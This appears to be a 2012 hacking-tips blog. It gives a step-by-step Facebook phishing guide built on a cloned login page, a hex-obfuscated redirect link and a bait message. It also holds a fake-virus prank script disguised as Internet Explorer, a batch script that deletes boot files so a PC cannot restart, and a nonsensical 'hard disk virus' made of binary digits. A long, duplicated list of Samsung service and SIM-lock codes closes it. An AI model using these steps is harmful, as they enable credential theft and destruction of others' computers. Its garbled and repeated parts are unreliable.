Wednesday, 24 October 2012
HOW TO STEAL SOMEONES FACEBOOK PASSWORD
Step 1: Creating your Malicious Site
We’re going to use the Social Engineering Toolkit to generate a malicious site, this site is going to look just like Facebook.
- So let’s load up SET and choose the following options.
- 2. Website Attack Vectors
- 3. Credential Harvesting Method
- 1. Web Site Templates
- 4. Facebook
Once you’re done and begin the task it will create something that looks like this.
Step 2. Delivering it to our Target
So the next thing we have to do is deliver this to our target, if you were clever and checked your address bar you’ll notice this is running on localhost or your external IP, obviously nobody is going to buy that Facebook moved to myevilplaypen.ru , so… We need to bury this a little bit so the average user will click on it. To do this we’re going to use Facebook to help us.
Create a Fan Page
No , seriously do it. On your Fan Page share a link to your external IP. In the case of this test I used dangertux.no-ip.org as my external IP address. If you click this link it should now take you to your fake facebook page…Still not quite there, plus we’re not trying to get people to go to your fan page. What we are going to do is abuse the Facebook Link system a little bit. If you note the link URI it will look something like this.
http://www.facebook.com/l.php?u=http%3A%2F%2Fdangertux.no-ip.org%2F&h=in 1AQBLHNJFAQA9XKOYmX3_jL-_LvCFztf1Mn0zx70LzshzSA
Ok — that’s pretty decent but let’s take it one step further since you can still see the URL in the link, we don’t want this. So we’re going to be a little bit clever, we are going to encode the dangertux.no-ip.org in hex. Which will leave us with something that looks like this.
%64%61%6e%67%65%72%74%75%78%2e%6e%6f%2d%69%70%2e%6f%72%67
Perfect, now let’s plug our hex encoded address into our link in place of our external IP and we’re left with something like this.
http://www.facebook.com/l.php?u=http%3A%2F%2F%64%61%6e%67%65%72%74%75%78%2e%6e%6f%2d%69%70%2e%6f%72%67%2F&h=in 1AQBLHNJFAQA9XKOYmX3_jL-_LvCFztf1Mn0zx70LzshzSA
Now that we have our link which sends people to our fake Facebook login page. So we’re going to deliver it to them. So email them or send them a message saying something like… Hey check out this stupid person’s profile picture. Or whatever thing you think they’ll click on it for.
What will likely happen is they will click the link, think they must have gotten logged out and that they have to log in. Once they log in they will be redirected to the REAL Facebook, and they will assume your link didn’t work. However, SET will have logged their credentials. Now — keep in mind you may want to have an ACTUAL link handy so you can say oops I copied the wrong link, this will help keep their suspicion from being too high.
SUCCESS!
Now check your SET session and you will notice that it has logged their credentials. It will look something like the following.
If you did everything correctly you should have logged their email address and password. That being said this attack isn’t going to work against everyone. It’s also a great way to lose friends, get banned from Facebook for life, and possibly depending on what you do with it go to prison.
Who this isn’t going to work on
This won’t work on pretty much anyone who actually looks at their URL bar (which isn’t most people). Nor will this work if they are smart enough to know that they need to be using SSL to transmit this type of data. It also won’t work if they understand how Facebook sessions work. However, the truth of the matter is it will work quite effectively against MOST Facebook users.
HOW TO CREAT A FAKE VIRUS
This is just a simple tutorial on how to create a script in
notepad that runs a fake virus in command prompt to
scare you friends. For most of you it is very dumb but its
just something kinda neat i'd thought i would show
some of the newbies on here.
1. OPEN NOTE PAD
2. ENTER THE FOLLOWING SCRIPT
3. Delete any dev Comments after the coding
"//...."
Those are just there to tell you guys what they do, so
delete them before saving.
4. Save file as "Anything you want" as a ".bat" file
5. Go to Desktop and Create a new "Shortcut"
6. Brose and Select the .bat file you just created
7. Name it something that they wouldn't suspect is a
virus. I like to name it "Internet Explorer"
8. Go to the properties of the new shortcut and select
"Change Icon"
9. Brose and Select the image that corresponds with the
title you named it. Since I chose "Internet
Explorer", I would select the default"Internet Explorer"
10. Wait until your friend/sibling clicks on the icon and
watch as he is freaked out by the fake virus!
I know this is very childish but it is just something kinda
funny to do in your free time. Try experimenting with new
commands to improve your batch files scripting better
and have fun guys!
notepad that runs a fake virus in command prompt to
scare you friends. For most of you it is very dumb but its
just something kinda neat i'd thought i would show
some of the newbies on here.
1. OPEN NOTE PAD
2. ENTER THE FOLLOWING SCRIPT
@echo off //Disables Commands from Displaying echo YOU HAVE A VIRUS ON YOUR COMPUTER pause echo CONTACTING ANTIVIRUS. . . pause set input= set /p input= DO YOU WANT TO DELETE VIRUS? [Y/N] if %input%==Y goto gold //If-Then Statements for Question if %input%==N goto next //If-Then Statements for Question if %input%==else goto next //If-Then Statements for Question :gold //Creating "Gold" echo ACCESS DENIED echo ACCESS DENIED echo ACCESS DENIED pause goto next :next //Creating Next echo ACTIVATING VIRUS pause echo VIRUS ACTIVATED! ! ! ! ! ! pause :1 dir \windows\system32\ //Scrolls Through your Files to make it more believable goto 1 //Creates a loop
3. Delete any dev Comments after the coding
"//...."
Those are just there to tell you guys what they do, so
delete them before saving.
4. Save file as "Anything you want" as a ".bat" file
5. Go to Desktop and Create a new "Shortcut"
6. Brose and Select the .bat file you just created
7. Name it something that they wouldn't suspect is a
virus. I like to name it "Internet Explorer"
8. Go to the properties of the new shortcut and select
"Change Icon"
9. Brose and Select the image that corresponds with the
title you named it. Since I chose "Internet
Explorer", I would select the default"Internet Explorer"
10. Wait until your friend/sibling clicks on the icon and
watch as he is freaked out by the fake virus!
I know this is very childish but it is just something kinda
funny to do in your free time. Try experimenting with new
commands to improve your batch files scripting better
and have fun guys!
HOW TO CRASH SOMEONES PC FOR EVER
HERE THERE R SOME EXCELLENT VIRUS SCRIPTS OF
WEBS MOST DANGEROUS SCRIPTS ALSO INCLUDED
IN THEM.
WEBS MOST DANGEROUS SCRIPTS ALSO INCLUDED
IN THEM.
How to crash a PC Forever !:::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts
it off once and deletes the files needed to reboot and
restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the
idiots)
**Also remember this might not work with vista.**
HOW TO CREAT HARD DISK VIRUS
TO DAY I WILL SHOW U A VIRUS TRICK TO FORMAT HARD DISK. U CAN SEND THIS FILE TO UR FRIEND OR ENEMY 2 FORMAT THERE HARD DISK. AND PLZ DONOT TRY THIS ON UR OWN COMPUTER OR U WILL END UP FORMATING UR OWN COMPUTER.
COPY THE BELOW CODES INTO NOTEPAD:
( 01001011000111110010010101010101010000011111100000 )
SAVE THE FILE AS: FORMAT.EXE
U HAVE CREAT UR OWN VIRUS.
ENJOY
COPY THE BELOW CODES INTO NOTEPAD:
( 01001011000111110010010101010101010000011111100000 )
SAVE THE FILE AS: FORMAT.EXE
U HAVE CREAT UR OWN VIRUS.
ENJOY
Monday, 22 October 2012
SAMSUNG MOBILE SECRET CODES
All Samsung Mobile Secret Codes:
*#8999*8378# = All in one Code
*#4777*8665# = GPRS Tool
*#8999*523# = LCD Brightness
*#8999*3825523# = External Display
*#8999*377# = Errors
#*5737425# = JAVA Something{I choose 2 and it chrashed}]
*#2255# = Call List
#*536961# = Java Status Code
#*536962# = Java Status Code
#*536963# = Java Status Code
#*53696# = Java Status Code
#*1200# = AFC DAC Val
#*1300# = IMEI
#*1400# = IMSI
#*2562# = ??? White for 15 secs than restarts.
#*2565# = ChAeck Blocking
#*3353# = Check Code
#*3837# = ??? White for 15 secs than restarts.
#*3849# = ??? White for 15 secs than restarts
#*3876# = ??? White for 15 secs than restarts.
#*7222# = Operation Typ (Class C GSM)
#*7224# = I Got !! ERROR !!
#*7252# = Oparation Typ (Class B GPRS)
#*7271# = Multi Slot (Class 1 GPRS)
#*7274# = Multi Slot (Class 4 GPRS)
#*7276# = Dunno
#*7337# = EEPROM Reset (Unlock and Resets Wap Settings)
#*2787# = CRTP ON/OFF
#*3737# = L1 Dbg data
#*5133# = L1 Dbg data
#*7288# = GPRS Attached
#*7287# = GPRS Detached
#*7666# = SrCell Data
#*7693# = Sleep Act/DeAct (Enable or Disable the Black screen after doing nothing for a while)
#*7284# = Class : B,C or GPRS
#*2256# = Calibration Info
#*2286# = Battery Data
#*2527# = GPRS Switching (set to: class 4, class 8, class 9 or class 10)
#*2679# = Copycat feature (Activate or Deactivate)
#*3940# = External loop test 9600 bps
#*4263# = Handsfree mode (Activate or Deactivate)
#*4700# = Half Rate (Activate or Deactivate)
#*7352# = BVMC Reg value
#*8462# = Sleeptime
#*2558# = Time ON
#*3370# = EFR (Activate or Deactivate)
#*3941# = External looptest 115200 bps
#*5176# = L1 Sleep
#*7462# = SIM phase
#*7983# = Voltage/Frequenci (Activate or Deactivate)
#*7986# = Voltage (Activate or Deactivate)
#*8466# = Old time
#*2255# = Call ???
#*5187# = L1C2G trace (Activate or Deactivate)
#*5376# = ??? White for 15 secs than restarts.
#*6837# = Official Software Version
#*7524# = KCGPRS
#*7562# = LOCI GPRS
#*7638# = RLC allways open ended TBF (Activate or Deactivate)
#*7632# = Sleep mode Debug
#*7673# = Sleep mode RESET
#*2337# = Permanent Registration Beep
#*2474# = ???
#*2834# = Audio Path
#*3270# = DCS support (Activate or Deactivate)
#*3282# = Data (Activate or Deactivate)
#*3476# = EGSM (Activate or Deactivate)
#*4760# = GSM (Activate or Deactivate)
#*4864# = Dunno doesn’t work on newer versions
#*5171# = L1P1
#*5172# = L1P2
#*5173# = L1P3
#*7326# = Accessory (I got Vibrator)
#*7683# = Sleep variable (
#*7762# = SMS Brearer CS (Activate or Deactivate)
#*8465# = Time in L1
#*9795# = wtls key
#*2252# = Current CAL
#*2836# = AVDDSS Management (Activate or Deactivate)
#*3877# = Dump of SPY trace
#*7728# = RSAV done# (Everything went to standart but nothing was deleted)
#*2677# = ARM State (None or Full Rate)
*#8999*636# = Have no clue what it is, i see 20 lines
*#9999# = Software version
*#8999*8376263# = HW ver, SW ver and Build Date
*#8888# = HW version
*#8377466# = Same HW/SW version thing
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
*2767*3855# = E2P Full Reset [/B]
*2767*2878# = E2P Custom Reset
*2767*927# = E2P Wap Reset
*2767*226372# = E2P Camera Reset
#*6420# = MIC Off
#*6421# = MIC On
#*6422# = MIC Data
#*6428# = MIC Measurement
#*3230# = Trace enable and DCD disable
#*3231# = Trace disable and DCD enable
#*3232# = Current Mode
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*335# = Delete all MMS Messages
*663867# = Dump Mm file
#*536961# = WAPSAR enable / HTTP disable
#*536962# = WAPSAR disable / HTTP enable
#*536963# = Serial eable / Others disable
#*53696# = Java Download Mode
#*5663351# = Wap Model ID [Your Model]
#*5663352# = Wap Model ID [SEC-SGHXXXX/1.0]
#*566335# = Wap Model ID [SEC-SGHXXXX/1.0]
*2767*66335# = Check on which model it is
*2767*7100# = SEC-SGHS100/1.0
*2767*8200# = SEC-SGHV200/1.0
*2767*7300# = SEC-SGHS300/1.0
*2767*688# = Unlocking Code
*#8999*8378# = All in one Code
*#4777*8665# = GPRS Tool
*#8999*523# = LCD Brightness
*#8999*3825523# = External Display
*#8999*377# = Errors
#*5737425# = JAVA Something{I choose 2 and it chrashed}]
*#2255# = Call List
#*536961# = Java Status Code
#*536962# = Java Status Code
#*536963# = Java Status Code
#*53696# = Java Status Code
#*1200# = AFC DAC Val
#*1300# = IMEI
#*1400# = IMSI
#*2562# = ??? White for 15 secs than restarts.
#*2565# = ChAeck Blocking
#*3353# = Check Code
#*3837# = ??? White for 15 secs than restarts.
#*3849# = ??? White for 15 secs than restarts
.
#*3851# = ??? White for 15 secs than restarts.
#*3851# = ??? White for 15 secs than restarts.
#*3876# = ??? White for 15 secs than restarts.
#*7222# = Operation Typ (Class C GSM)
#*7224# = I Got !! ERROR !!
#*7252# = Oparation Typ (Class B GPRS)
#*7271# = Multi Slot (Class 1 GPRS)
#*7274# = Multi Slot (Class 4 GPRS)
#*7276# = Dunno
#*7337# = EEPROM Reset (Unlock and Resets Wap Settings)
#*2787# = CRTP ON/OFF
#*3737# = L1 Dbg data
#*5133# = L1 Dbg data
#*7288# = GPRS Attached
#*7287# = GPRS Detached
#*7666# = SrCell Data
#*7693# = Sleep Act/DeAct (Enable or Disable the Black screen after doing nothing for a while)
#*7284# = Class : B,C or GPRS
#*2256# = Calibration Info
#*2286# = Battery Data
#*2527# = GPRS Switching (set to: class 4, class 8, class 9 or class 10)
#*2679# = Copycat feature (Activate or Deactivate)
#*3940# = External loop test 9600 bps
#*4263# = Handsfree mode (Activate or Deactivate)
#*4700# = Half Rate (Activate or Deactivate)
#*7352# = BVMC Reg value
#*8462# = Sleeptime
#*2558# = Time ON
#*3370# = EFR (Activate or Deactivate)
#*3941# = External looptest 115200 bps
#*5176# = L1 Sleep
#*7462# = SIM phase
#*7983# = Voltage/Frequenci (Activate or Deactivate)
#*7986# = Voltage (Activate or Deactivate)
#*8466# = Old time
#*2255# = Call ???
#*5187# = L1C2G trace (Activate or Deactivate)
#*5376# = ??? White for 15 secs than restarts.
#*6837# = Official Software Version
#*7524# = KCGPRS
#*7562# = LOCI GPRS
#*7638# = RLC allways open ended TBF (Activate or Deactivate)
#*7632# = Sleep mode Debug
#*7673# = Sleep mode RESET
#*2337# = Permanent Registration Beep
#*2474# = ???
#*2834# = Audio Path
#*3270# = DCS support (Activate or Deactivate)
#*3282# = Data (Activate or Deactivate)
#*3476# = EGSM (Activate or Deactivate)
#*3676# = Flash volume formated
#*4760# = GSM (Activate or Deactivate)
#*4864# = Dunno doesn’t work on newer versions
#*5171# = L1P1
#*5172# = L1P2
#*5173# = L1P3
#*7326# = Accessory (I got Vibrator)
#*7683# = Sleep variable (
#*7762# = SMS Brearer CS (Activate or Deactivate)
#*8465# = Time in L1
#*9795# = wtls key
#*2252# = Current CAL
#*2836# = AVDDSS Management (Activate or Deactivate)
#*3877# = Dump of SPY trace
#*7728# = RSAV done# (Everything went to standart but nothing was deleted)
#*2677# = ARM State (None or Full Rate)
*#8999*636# = Have no clue what it is, i see 20 lines
*#9999# = Software version
*#8999*8376263# = HW ver, SW ver and Build Date
*#8888# = HW version
*#8377466# = Same HW/SW version thing
*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
*2767*3855# = E2P Full Reset [/B]
*2767*2878# = E2P Custom Reset
*2767*927# = E2P Wap Reset
*2767*226372# = E2P Camera Reset
#*6420# = MIC Off
#*6421# = MIC On
#*6422# = MIC Data
#*6428# = MIC Measurement
#*3230# = Trace enable and DCD disable
#*3231# = Trace disable and DCD enable
#*3232# = Current Mode
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*335# = Delete all MMS Messages
*663867# = Dump Mm file
#*536961# = WAPSAR enable / HTTP disable
#*536962# = WAPSAR disable / HTTP enable
#*536963# = Serial eable / Others disable
#*53696# = Java Download Mode
#*5663351# = Wap Model ID [Your Model]
#*5663352# = Wap Model ID [SEC-SGHXXXX/1.0]
#*566335# = Wap Model ID [SEC-SGHXXXX/1.0]
*2767*66335# = Check on which model it is
*2767*7100# = SEC-SGHS100/1.0
*2767*8200# = SEC-SGHV200/1.0
*2767*7300# = SEC-SGHS300/1.0
U SHOULD TRY IT GUYS
Subscribe to:
Posts (Atom)